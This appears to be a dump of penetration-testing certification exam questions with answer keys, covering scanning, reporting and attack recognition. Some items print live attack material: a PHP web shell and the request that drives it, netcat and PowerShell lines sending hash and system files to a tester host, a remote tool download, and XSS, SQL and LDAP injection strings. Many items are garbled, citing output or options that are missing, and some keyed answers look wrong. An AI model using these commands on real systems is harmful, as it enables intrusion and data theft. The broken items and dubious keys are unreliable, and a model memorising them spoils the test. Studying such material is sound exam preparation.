Dump 4 Flashcards
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:
Which of the following is the penetration tester conducting?
A.
Port scan
B.
Brute force
C.
Credential stuffing
D.
DoS attack
Answer: B
During passive reconnaissance of a target organization’s infrastructure, a penetration tester wants
to identify key contacts and job responsibilities within the company. Which of the following
techniques would be the most effective for this situation?
A.
Social media scraping
B.
Website archive and caching
C.
DNS lookup
D.
File metadata analysis
Answer: A
A penetration tester wrote the following Bash script to brute force a local service password:
Answer: A
Which of the following documents would be the most helpful in determining who is at fault for a
temporary outage that occurred during a penetration test?
A.
Non-disclosure agreement
B.
Business associate agreement
C.
Assessment scope and methodologies
D.
Executive summary
Answer: C
A penetration tester discovers passwords in a publicly available data breach during the
reconnaissance phase of the penetration test. Which of the following is the best action for the
tester to take?
A.
Add the passwords to an appendix in the penetration test report.
B.
Do nothing. Using passwords from breached data is unethical.
C.
Contact the client and inform them of the breach.
D.
Use the passwords in a credential stuffing attack when the external penetration test begins.
Answer: C
A penetration tester is trying to bypass an active response tool that blocks IP addresses that have
more than 100 connections per minute. Which of the following commands would allow the tester to
finish the test without being blocked?
A.
nmap –sU –p 1–1024 10.0.0.15
B.
nmap –p 22, 25, 80, 3389 –T2 10.0.0.15 –Pn
C.
nmap –T5 –p 1–65535 –A 10.0.0.15
D.
nmap –T3 –F 10.0.0.15
Answer: B
A penetration tester runs the following command on a system:
find / –user root –perm -4000 –print 2>/dev/null
Which of the following is the tester trying to accomplish?
A.
Set the SGID on all files in the /directory.
B.
Find the /root directory on the system.
C.
Find files with the SUID bit set.
D.
Find files that were created during exploitation and move them to /dev/null.
Answer: C
Which of the following tools provides Python classes for interacting with network protocols?
A.
Responder
B.
Impacket
C.
Empire
D.
PowerSploit
Answer: B
A security engineer is trying to bypass a network IPS that isolates the source when the scan
exceeds 100 packets per minute. The scope of the scan is to identify web servers in the
10.0.0.0/16 subnet. Which of the following commands should the engineer use to achieve the
objective in the least amount of time?
A.
nmap –T3 –p 80 10.0.0.0/16 ––max-hostgroup 100
B.
nmap –T0 –p 80 10.0.0.0/16
C.
nmap –T4 –p 80 10.0.0.0/16 ––max-rate 60
D.
nmap –T5 –p 80 10.0.0.0/16 ––min-rate 80
Answer: B
A penetration tester is performing a social engineering penetration test and was able to create a
remote session. Which of the following social engineering techniques was most likely successful?
A.
SMS phishing
B.
Dumpster diving
C.
Executive impersonation attack
D.
Browser exploitation framework
Answer: C
A penetration tester requested, without express authorization, that a CVE number be assigned for
a new vulnerability found on an internal client application. Which of the following did the
penetration tester most likely breach?
A.
ROE
B.
SLA
C.
NDA
D.
SOW
Answer: C
Penetration-testing activities have concluded, and the initial findings have been reviewed with the
client. Which of the following best describes the NEXT step in the engagement?
A.
Performing a live demonstration of the results to the system administrators
B.
Scheduling of follow-up actions and retesting
C.
Attestation of findings and delivery of the report
D.
Review of the lessons during the engagement
Answer: C
A penetration tester conducted a discovery scan that generated the following:
Which of the following commands generated the results above and will transform them into a list of
active hosts for further analysis?
A.
nmap –oG list.txt 192.168.0.1-254 | sort
B.
nmap –sn 192.168.0.1-254 | grep “Nmap scan? | awk ‘{print $5}’
C.
nmap ––open 192.168.0.1-254 | uniq | sed ‘s/Nmap//2’ > file.txt
D.
nmap –O 192.168.0.1-254 | cut –f
Answer: B
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a
company’s network, with the constrained objective of gaining access to sensitive personnel files.
During the assessment, the red-team tester identifies an artifact indicating possible prior
compromise within the target environment. Which of the following actions should the tester take?
A.
Perform forensic analysis to isolate the means of compromise and determine attribution.
B.
Incorporate the newly identified method of compromise into the red team’s approach.
C.
Create a detailed document of findings before continuing with the assessment.
D.
Halt the assessment and follow the reporting procedures as outlined in the contract.
Answer: D
A penetration tester identified numerous flaws that could lead to unauthorized modification of
critical data. Which of the following would be best for the penetration tester to recommend?
A.
Flat access
B.
Role-based access control
C.
Permission-based access control
D.
Group-based control model
Answer: B
Which of the following tools would be the best to use to intercept an HTTP response of an API,
change its content, and forward it back to the origin mobile device?
A.
Drozer
B.
Burp Suite
C.
Android SDK Tools
D.
MobSF
Answer: B
A penetration tester is conducting a test after hours and notices a critical system was taken down.
Which of the following contacts should be notified first?
A.
Secondary
B.
Emergency
C.
Technical
D.
Primary
Answer: B
A penetration tester wants to perform reconnaissance without being detected. Which of the
following activities have a minimal chance of detection? (Choose two.)
A.
Open-source research
B.
A ping sweep
C.
Traffic sniffing
D.
Port knocking
E.
A vulnerability scan
F.
An Nmap scan
Answer: A,C
During an assessment, a penetration tester found a suspicious script that could indicate a prior
compromise. While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
A.
Spawn a local shell.
B.
Disable NIC.
C.
List processes.
D.
Change the MAC address.
Answer: D
During an assessment, a penetration tester found a web component with no authentication
requirements. The web component also allows file uploads and is hosted on one of the target
public web servers. Which of the following actions should the penetration tester perform next?
A.
Continue the assessment and mark the finding as critical.
B.
Attempt to remediate the issue temporarily.
C.
Notify the primary contact immediately.
D.
Shut down the web server until the assessment is finished.
Answer: C
During an assessment, a penetration tester obtains a list of password digests using Responder.
Which of the following tools would the penetration tester most likely use next?
A.
Hashcat
B.
Hydra
C.
CeWL
D.
Medusa
Answer: A
A penetration tester is performing a vulnerability scan on a large ATM network. One of the
organization’s requirements is that the scan does not affect legitimate clients’ usage of the ATMs.
Which of the following should the tester do to best meet the company’s vulnerability scan
requirements?
A.
Use Nmap’s-T2 switch to run a slower scan and with less resources.
B.
Run the scans using multiple machines.
C.
Run the scans only during lunch hours.
D.
Use Nmap’s-host-timeout switch to skip unresponsive targets.
Answer: A
A penetration tester has obtained a low-privilege shell on a Windows server with a default
configuration and now wants to explore the ability to exploit misconfigured service permissions.
Which of the following commands would help the tester start this process?
A.
certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe
B.
powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’,
‘systeminfo.txt’)
C.
schtasks /query /fo LIST /v | find /I “Next Run Time:?
D.
wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe
Answer: A
A penetration tester issues the following command after obtaining a shell:
Which of the following describes this technique?
A.
Establishing a backdoor
B.
Privilege escalation
C.
PowerShell remoting
D.
Living-off-the-land
Answer: D
A penetration tester observes an application enforcing strict access controls. Which of the
following would allow the tester to bypass these controls and successfully access the
organization’s sensitive files?
A.
Remote file inclusion
B.
Cross-site scripting
C.
SQL injection
D.
Insecure direct object references
Answer: D
While conducting a penetration test of a web application, the penetration tester enters the
following URI:
http://test.comptia.com/../../../../etc/shadow
Which of the following attacks is the tester attempting?
A.
XML injection
B.
SQL injection
C.
Directory traversal
D.
Buffer overflow
Answer: C
A penetration testing firm wants to hire three additional consultants to support a newly signed
long-term contract with a major customer. The following is a summary of candidate background
checks:
Which of the following candidates should MOST likely be excluded from consideration?
A.
Candidate 1
B.
Candidate 2
C.
Candidate 3
D.
Candidate 4
Answer: B
Which of the following is a ROE component that provides a penetration tester with guidance on
who and how to contact the necessary individuals in the event of a disaster during an
engagement?
A.
Engagement scope
B.
Communication escalation path
C.
SLA
D.
SOW
Answer: B
Given the following Bash code snippet:
A.
User enumeration
B.
Directory brute-force attack
C.
Port scan
D.
File download
Answer: D
Given the following user-supplied data:
www.comptia.com/info. php?id=1 AND 1=1
Which of the following attack techniques is the penetration tester likely implementing?
A.
Boolean-based SQL injection
B.
Time-based SQL injection
C.
Stored cross-site scripting
D.
Reflected cross-site scripting
Answer: A
A penetration tester is taking screen captures of hashes obtained from a domain controller. Which
of the following BEST explains why the penetration tester should immediately obscure portions of
the images before saving?
A.
To maintain confidentiality of data/information
B.
To avoid disclosure of how the hashes were obtained
C.
To make the hashes appear shorter and easier to crack
D.
To prevent analysis based on the type of hash
Answer: A
Which of the following tools can a penetration tester use to brute force a user password over SSH
using multiple threads?
A.
CeWL
B.
John the Ripper
C.
Hashcat
D.
Hydra
Answer: D
Given the following code:
Which of the following tasks could be accomplished with the script?
A.
Reverse shell
B.
Ping sweep
C.
File download
D.
Port scan
Answer: D
Which of the following tools would help a penetration tester locate a file that was uploaded to a
content management system?
A.
DirBuster
B.
Open VAS
C.
Scout Suite
D.
CeWL
Answer: A
A penetration tester fuzzes an internal server looking for hidden services and applications and
obtains the following output:
Which of the following is the MOST likely explanation for the output?
A.
The tester is not using a valid SSL certificate.
B.
The admin directory cannot be fuzzed because it is forbidden.
C.
The admin, test, and db directories redirect to the log-in page.
D.
The robots.txt file has six entries in it.
Answer: C
A penetration tester has been provided with only the public domain name and must enumerate
additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Tool created this output: TheHarvester
Commands for nslookup and dig output:
dig @8.8.8.8 +noall +answer someclouddomain.org
nslookup someclouddomain.org 8.8.8.8
WHOIS Information:
Domain hosted by: Amazon
Domain registered by: LocalComputerPro’s, Inc.
Domain registration date: 1993-09-22T04:00:38Z
A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used
to gather information about the wireless network?
A.
Kismet
B.
Burp Suite
C.
BeEF
D.
WHOIS
Answer: A
During an engagement, a penetration tester was able to upload to a server a PHP file with the
following content:
<?php system($_POST[‘cmd’]) ?>
Which of the following commands should the penetration tester run to successfully achieve RCE?
A.
python3 -c “import requests;print(requests.post(url-
‘http://172.16.200.10/uploads/shell.php’,data={‘cmd=id’}))”
B.
python3 -c “import requests;print(requests.post(url-
‘http://172.16.200.10/uploads/shell.php’,data={‘cmd’: ‘id’}).text)”
C.
python3 -c “import requests;print(requests.get(url-
‘http://172.16.200.10/uploads/shell.php’,params={‘cmd’: ‘id’}))”
D.
python3 -c “import requests;print(requests.get(url-
‘http://172.16.200.10/uploads/shell.php’,params={‘cmd’: ‘id’}).test)”
Answer: B
A penetration tester discovered a code repository and noticed passwords were hashed before they
were stored in the database with the following code:
salt = ‘saltl23’
hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000)
The penetration tester recommended the code be updated to the following:
salt = os.urandom(32)
hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000)
Which of the following steps should the penetration tester recommend?
A.
Changing passwords that were created before this code update
B.
Storing hashes created by both methods for compatibility
C.
Rehashing all old passwords with the new code
D.
Updating the SHA-256 algorithm to something more secure
Answer: A
Which of the following describes a globally accessible knowledge base of adversary tactics and
techniques based on real-world observations?
A.
OWASP Top 10
B.
MITRE ATT&CK
C.
Cyber Kill Chain
D.
Well-Architected Framework
Answer: B
An organization wants to identify whether a less secure protocol is being utilized on a wireless
network. Which of the following types of attacks will achieve this goal?
A.
False negotiation
B.
Collision
C.
Bad handshake
D.
Downgrade
Answer: D
While a penetration tester conducts a web application assessment, the following URL is accessed:
http://comptia.com/index.php?id=1%20ORR%2022-7%3d10
Which of the following exploit types is being attempted?
A.
XML injection
B.
SQL injection
C.
Session hijacking
D.
Buffer overflow
Answer: B
Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up
a fake log-in page and harvest credentials when target employees click on links in a phishing
email. Which of the following commands would best help the tester determine which cloud email
provider the log-in page needs to mimic?
A.
dig company.com MX
B.
whois company.com
C.
curl www.company.com
D.
dig company.com A
Answer: A
A penetration tester runs an Nmap scan and obtains the following output:
Which of the following commands should the penetration tester try next to explore this server?
A.
nikto -host http://10.22.2.2
B.
hydra -l administrator -P passwords.txt ftp://10.22.2.2
C.
nmap -p 3389 –script vnc-info.nse 10.22.2.2
D.
medusa -h 10.22.2.2 -n 1433 -u sa -P passwords.txt -M mssql
Answer: D
During a reconnaissance exercise, a penetration tester runs the following Nmap command:
nmap -sT -sV -T2 -p 1-65535 domain.com
After watching the scan run for more than two hours, the tester wants to optimize the full scan.
Which of the following is the best way to speed up the scan?
A.
Scan fewer ports list.
B.
Scan via UDP to improve speed.
C.
Change -sT to -sS.
D.
Keep the scan timing.
Answer: C
Which of the following elements of a penetration testing report aims to provide a normalized and
standardized representation of discovered vulnerabilities and the overall threat they present to an
affected system or network?
A.
Executive summary
B.
Vulnerability severity rating
C.
Recommendations of mitigation
D.
Methodology
Answer: B
A penetration tester is scanning a customer subnet and wants to scan ports that are known to
have only well-known UDP services present. Which of the following can the tester use to scan for
SNMP. NTP, NetBIOS, and DNS?
A.
nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan
B.
nmap -vv -sXV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan
C.
nmap -vv -sTV -p 53, 123, 137-139,161,123 192.168.1.0/24 -oA udpscan
D.
nmap -vv -sUV -p 53-161,192.168.1.0 -oA udpscan
Answer: A
Which of the following OSSTM testing methodologies should be used to test under the worst
conditions?
A.
Tandem
B.
Reversal
C.
Semi-authorized
D.
Known environment
Answer: B
A penetration tester is testing a company’s public APIs. In researching the API URLs, the
penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is blocking
the penetration tester’s attack attempts. Which of the following should the tester do to best ensure
the attacks will be more successful?
A.
Increase the volume of attacks to enable more to possibly slip through.
B.
Vary the use of upper and lower case characters in payloads to fool the WAF.
C.
Use multiple source IP addresses for the attack traffic to prevent being blocked.
D.
Locate the company’s servers that are hosting the API and send the traffic there.
Answer: C
A company recruited a penetration tester to brute force an SSH password on a server. The tester
would like to use THC Hydra to perform the attack and remember the use of the -t option. Which of
the following should be considered when using this option?
A.
The number of connects in parallel per target
B.
The number of task connects in parallel overall
C.
The waiting time for a response between connects per threads
D.
If the output shows log-ins and passwords for each attempt
Answer: A
During a security assessment, a penetration tester decides to use the following Python snippet:
Which of the following best describes what the penetration tester is trying to achieve?
A.
Web server denial of service
B.
Web application firewall bypass
C.
Web server response time estimation
D.
Web server latency estimation
Answer: A
An organization’s Chief Information Security Officer debates the validity of a critical finding from a
penetration assessment that was completed six months ago. Which of the following post-report
delivery activities would have most likely prevented this scenario?
A.
Client acceptance
B.
Data destruction process
C.
Attestation of findings
D.
Lessons learned
Answer: C
A penetration tester is testing a company’s public API and discovers that specific input allows the
execution of arbitrary commands on the base operating system. Which of the following actions
should the penetration tester take next?
A.
Include the findings in the final report.
B.
Notify the client immediately.
C.
Document which commands can be executed.
D.
Use this feature to further compromise the server.
Answer: B
A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the
following is the most likely explanation for keeping the diary?
A.
To facilitate post-engagement cleanup
B.
To monitor lessons learned
C.
To foster client acceptance
D.
To follow the data destruction process
Answer: A
Which of the following is the most important aspect to consider when calculating the price of a
penetration test service for a client?
A.
Operating cost
B.
Required scope of work
C.
Non-disclosure agreement
D.
Client’s budget
Answer: B
While performing a mobile application penetration test, a security consultant notices that the user
password is being locally encrypted before it is sent to the back end for authentication. Which of
the following techniques would be best for the consultant to use to find the encryption algorithm
and the encryption key?
A.
Sandbox analysis
B.
Information leakage
C.
Reverse engineering
D.
Brute-force attack
Answer: C
A client has requested that the penetration test scan include the following UDP services: SNMP.
NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
A.
nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
B.
nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
C.
nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
D.
nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
Answer: C
A penetration tester wants to identify the most common TCP ports on 10.7.8.69. Which of the
following is the best Nmap command for this task?
A.
nmap 10.7.8.69 -sS -sA -sV -F
B.
nmap 10.7.8.69 -sT -sA -p1-65535
C.
nmap 10.7.8.69 -sC -sV -Pn
D.
nmap 10.7.8.69 -sX -sU –top-ports
Answer: A
A penetration tester is gathering information and wants to retrieve hostnames and IP addresses.
Which of the following should the tester do?
A.
Obtain password dumps
B.
Implement SSL/TLS certificate analysis.
C.
Perform DNS lookups
D.
Conduct web scraping
Answer: C
A penetration tester needs to perform a vulnerability scan on a highly critical and fragile
infrastructure system. Which of the following should the penetration tester do to minimize the risk?
A.
Implement query throttling
B.
Use high-bandwidth scanning techniques.
C.
Enable aggressive and indiscriminate scanning options
D.
Use a SYN flag to avoid detection
Answer: A
A penetration tester discovers a login page during an assessment. Which of the following tools
would the tester use to brute force a password?
A.
Hydra
B.
Wireshark
C.
SQLmap
D.
TinEye
Answer: A
A penetration test is in the scoping phase of an engagement. Which of the following describes how
a penetration tester would most effectively obtain the information necessary to begin testing?
A.
Wait for the client to tell them
B.
Start an email chain so communications are documented
C.
Ask previous penetration test providers what they looked at
D.
Send a preengagement survey to the client to fill out
Answer: D
A penetration tester would like to know if any web servers or mail servers are running on the inscope
network segment. Which of the following is the best to use in this scenario?
A.
ARP scans
B.
Website crawling
C.
DNS lookups
D.
Nmap probes
Answer: D
During an engagement with a financial institution, a penetration tester found hard-coded
credentials in a publicly accessible code repository. Those credentials allowed the penetration
tester to access PII from many of the institution’s customers and services that are hosted by a cloud provider. Which of the following actions should the penetration tester do next?
A.
Proceed with the engagement and add the evidence in the final report
B.
Keep the found credentials and use them during the engagement
C.
Disclose the findings through a bug bounty platform
D.
Report the findings to the customer’s technical contact immediately
Answer: D
A penetration tester captures SMB network traffic and discovers that users are mistyping the name
of a fileshare server. This causes the workstations to send out requests attempting to resolve the
fileshare server’s name. Which of the following is the best way for a penetration tester to exploit
this situation?
A.
Relay the traffic to the real file server and steal documents as they pass through
B.
Host a malicious file to compromise the workstation
C.
Reply to the broadcasts with a fake IP address to deny access to the real file server
D.
Respond to the requests with the tester’s IP address and steal authentication credentials
Answer: D
A penetration tester is conducting an engagement for a company and has identified a vulnerable
web application. During the reconnaissance phase the tester discovers that the internal web
application contains end-of-life components. Which of the following is the most appropriate next
step?
A.
Report the vulnerability to the company’s IT department and provide the department with detailed
information for patching the application
B.
Perform a brute-force attack on the web application’s log-in page to test the strength of user
passwords
C.
Launch a denial-of-service attack against the web application to disrupt its availability and expose
potential vulnerabilities
D.
Exploit the vulnerability to gam access to the web application’s back-end systems
Answer: D
A penetration tester performs several Nmap scans against the web application for a client.
INSTRUCTIONS
Click on the WAF and servers to review the results of the Nmap scans. Then click on each tab to
select the appropriate vulnerability and remediation options.
Perform a SSRF attack against App01.example.com from CDN.example.com
Restrict direct communications to App01.example.com to only approved components.
Require an additional authentication header value between CDN.example.com and
App01.example.com.
A security analyst is conducting a penetration test for an online store with a database server.
Which of the following tools would best assist the tester in detecting vulnerabilities on that server?
A.
Burp Suite
B.
Nessus
C.
Nikto
D.
SQLmap
Answer: B
A company developed a new web application to allow its customers to submit loan applications. A
penetration tester is reviewing the application and discovers that the application was developed in
ASP and used MSSQL for its back-end database. Using the application’s search form, the
penetration tester inputs the following code in the search input field:
IMG
SRC=vbscript:msgbox(“Vulnerable_to_Attack”);>originalAttribute=”SRC”originalPath=”vbscript;ms
gbox (“Vulnerable_to_Attack “);>”
When the tester checks the submit button on the search form, the web browser returns a pop-up
windows that displays “Vulnerable_to_Attack.” Which of the following vulnerabilities did the tester
discover in the web application?
A.
SQL injection
B.
Command injection
C.
Cross-site request forgery
D.
Cross-site scripting
Answer: D
Which of the following legal concepts specifically outlines the scope, deliverables, and timelines of
a project or engagement?
A.
MSA
B.
NDA
C.
SLA
D.
SOW
Answer: D
A client claims that a ransomware attack has crippled its corporate network following a penetration
test assessment. Which of the following is the most likely root cause of this issue?
A.
Client reluctance to accept findings
B.
Lack of attestation
C.
Incomplete data destruction process
D.
Failure to remove tester-created credentials
Answer: D
A penetration tester is conducting an on-path link layer attack in order to take control of a key fob
that controls an electric vehicle. Which of the following wireless attacks would allow a penetration
tester to achieve a successful attack?
A.
Bluejacking
B.
Bluesnarfing
C.
BLE attack
D.
WPS PIN attack
Answer: C
A penetration tester runs an Nmap scan and obtains the following output:
Which of the following should the penetration tester run next to explore this host further?
A.
OpenVAS
B.
BloodHound
C.
DirBuster
D.
Nikto
Answer: A
A penetration tester is conducting a physical test against an organization. During the first day of
the assessment, the tester follows an employee to the coffee shop next door. While the employee
is ordering, the tester stands near the employee and captures the employee’s badge
electronically. Which of the following exploits is the penetration tester most likely conducting?
A.
Tailgating
B.
Bluesnarfing
C.
RFID cloning
D.
Session hijacking
Answer: C
As part of an active reconnaissance, a penetration tester intercepts and analyzes network traffic,
including API requests and responses. Which of the following can be gained by capturing and
examining the API traffic?
A.
Assessing the performance of the network’s API communication
B.
Identifying the token/authentication detail
C.
Enumerating all users of the application
D.
Extracting confidential user data from the intercepted API responses
Answer: B
Which of the following is a declaration from an independent third party that lends credibility to the
part of the organization undergoing the review and is required as part of an audit?
A.
Executive summary
B.
Client acceptance
C.
Attestation of findings
D.
Lessons learned
Answer: C
During an assessment, a penetration tester discovers the following code sample in a web
application:
”(&(userid=)(userid=))(|(userid=*)
(userPwd={SHA1}a9993e364706816aba3e25717850c26c9cd0d89d==))”;
Which of the following injections is being performed?
A.
Boolean SQL
B.
Command
C.
Blind SQL
D.
LDAP
Answer: D
A penetration tester gained access to one of the target company’s servers. During the
enumeration phase, the penetration tester lists the bash history and observes the following row:
curl -k ‘imaps://10.12.14.121’ –user jsmith:Blu3moon -v
Which of the following steps should the penetration tester take next?
A.
Brute force all mail users.
B.
Enumerate mall server users.
C.
Attempt to read email.
D.
Download hashes.
Answer: C
A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part
of the password is Winter followed by four digits and a special character at the end. Which of the
following commands should the tester use?
A.
john hash.txt –format=MD5 –wordlist=seasons.txt –fork=8 –rules=base64
B.
hashcat hash.txt -m 0 -a 6 seasons.txt ?d?d?d?d?s
C.
john hash.txt –format=Raw-MD5 –rules=jumbo –wordlist=seasons.txt
D.
hashcat hahs.txt -m 500 -a 7 –force -) -w 4 –opencl-device-types 1,2
Answer: B
During a penetration test, a security consultant needs to automate the hash calculation of each
password in a text file and store the results in memory. Which of the following Python snippets
should the tester use to accomplish this task?
Answer: A
A penetration tester managed to get control of an internal web server that is hosting the IT
knowledge base. Which of the following attacks should the penetration tester attempt next?
A.
Vishing
B.
Watering hole
C.
Whaling
D.
Spear phishing
Answer: B
Which of the following best explains why a penetration tester would use ProxyChains during an
assessment?
A.
To harvest credentials
B.
To use remote access tools
C.
To fingerprint the organization
D.
To automate protocols
Answer: B
A penetration tester gets a shell on a server and runs the following command:
nc kaliworkstation 4444 < hashes.txt
The penetration tester runs the following command on a Kali workstation:
nc -nlvp 4444 > hashes.txt
Which of the following best describes what the penetration tester is attempting to do?
A.
Exfiltrate a file from the server.
B.
Obtain a higher privilege reverse shell.
C.
Copy a file to the target server.
D.
Delete a file from the Kali workstation.
Answer: A
Which of the following components should a penetration tester most likely include in a report at the end of an assessment?
A.
Metrics and measures
B.
Client interviews
C.
Compliance information
D.
Business policies
Answer: A
In a standard engagement, a post-report document is provided outside of the report. This
document:
Does not contain specific findings
Exposes vulnerabilities
Can be shared publicly with outside parties that do not have an in-depth understanding about
the client’s network
Which of the following documents is described?
A.
Attestation letter
B.
Findings report
C.
Executive summary
D.
Non-disclosure agreement
Answer: C
A penetration tester is configuring a vulnerability management solution to perform a scan of Linux
servers on an enterprise network. The client wants to reduce potential disruptions as much as
possible. Which of the following types of accounts should the tester use?
A.
Read-only user
B.
SSH LDAP user
C.
Domain administrator
D.
Unprivileged user
Answer: A
A penetration testing team has gained access to an organization’s data center, but the team
requires more time to test the attack strategy. Which of the following wireless attack techniques
would be the most successful in preventing unintended interruptions?
A.
Captive portal
B.
Evil twin
C.
Bluejacking
D.
Jamming
Answer: B
A penetration tester is looking for a particular type of service and obtains the output below:
Which of the following commands was executed by the tester?
A.
nmap -sU -pU:517 -Pn -n –script=supermicro-ipmi-config <target>
B.
nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>
C.
nmap -sU -pU:161 -Pn -n --script=voldemort-info <target>
D.
nmap -sU -pU:37 -Pn -n --script=icap-info <target></target></target></target></target>
Answer: B
A penetration tester is troubleshooting the right value for the urls variable that should be used in
the following script:
Which of the following instructions in a Python script will prevent duplicate entries in the output and
work with the script above?
A.
[u for u in url_list if u not in url_list]
B.
list({u: True for u in url_list}.keys())
C.
f”{u: True for u in url_list}”
D.
json.dumps({u: True for u in url_list}.keys())
Answer: B
While performing reconnaissance, a penetration tester runs Nmap and receives the following
output:
Nmap scan report for samplescan.org (44.33.55.66)
Host is up (0.025s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE
22/tcp open
23/tcp open
80/tcp open
443/tcp open
Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds
Which of the following ports should the penetration tester sniff the traffic on to obtain sensitive
information?
A.
22
B.
23
C.
80
D.
443
Answer: B
During an assessment, a penetration tester was able to get access on all target servers by
attempting authentication using a service account key that was published on the intranet site as
part of a standard procedure. Which of the following should the penetration tester recommend for
this type of finding?
A.
Password encryption
B.
Role-based access control
C.
Secrets management solution
D.
Time-of-day restrictions
Answer: C
A penetration tester discovers that an organization’s infrastructure is hosted in the cloud. Which of
the following technologies should the penetration tester explore for vulnerabilities? (Choose two.)
A.
Virtualization
B.
Kubernetes
C.
Docker
D.
BIOS
E.
UEFI
F.
DNS
Answer: A,B
Given the following table:
Which of the following data structures would most likely be used to store Known-good
configurations of firewall rules in a Python script?
A.
Lists
B.
Trees
C.
Dictionaries
D.
Tuples
Answer: C
Which of the following tools would be best to use to conceal data in various kinds of image files?
A.
Kismet
B.
Snow
C.
Responder
D.
Metasploit
Answer: B
A penetration tester runs a reconnaissance script and would like the output in a standardized
machine-readable format in order to pass the data to another application. Which of the following is
the best for the tester to use?
A.
JSON
B.
Lists
C.
XLS
D.
Trees
Answer: A
Which of the following best explains why communication is a vital phase of a penetration test?
A.
To discuss situational awareness
B.
To build rapport with the emergency contact
C.
To explain the data destruction process
D.
To ensure the likelihood of future assessments
Answer: A
Which of the following describes how a penetration tester could prioritize findings in a report?
A.
Business mission and goats
B.
Cyberassets
C.
Network infrastructure
D.
Cyberthreats
Answer: D
During a security assessment, a penetration tester decides to implement a simple TCP port
scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would
achieve this task?
Answer: A
A penetration tester is doing an assessment for a company that requires an external commandand-
control server. The command-and-control tool should be able to use multiple types of
payloads (PowerShell, SMB, and binaries) and centralize the management of compromised
systems. Which of the following tools should the tester use?
A.
BeEF
B.
Covenant
C.
Censys
D.
Reaver
Answer: B
A penetration tester is gathering information about a target company for a penetration test in order
to tailor the type of attacks. However, the tester is worried about sending packets to the company
that could tip off the SOC before the attacks begin. Which of the following sources should the
tester use to achieve this objective?
A.
Nmap
B.
Shodan
C.
CeWL
D.
Nessus
Answer: B
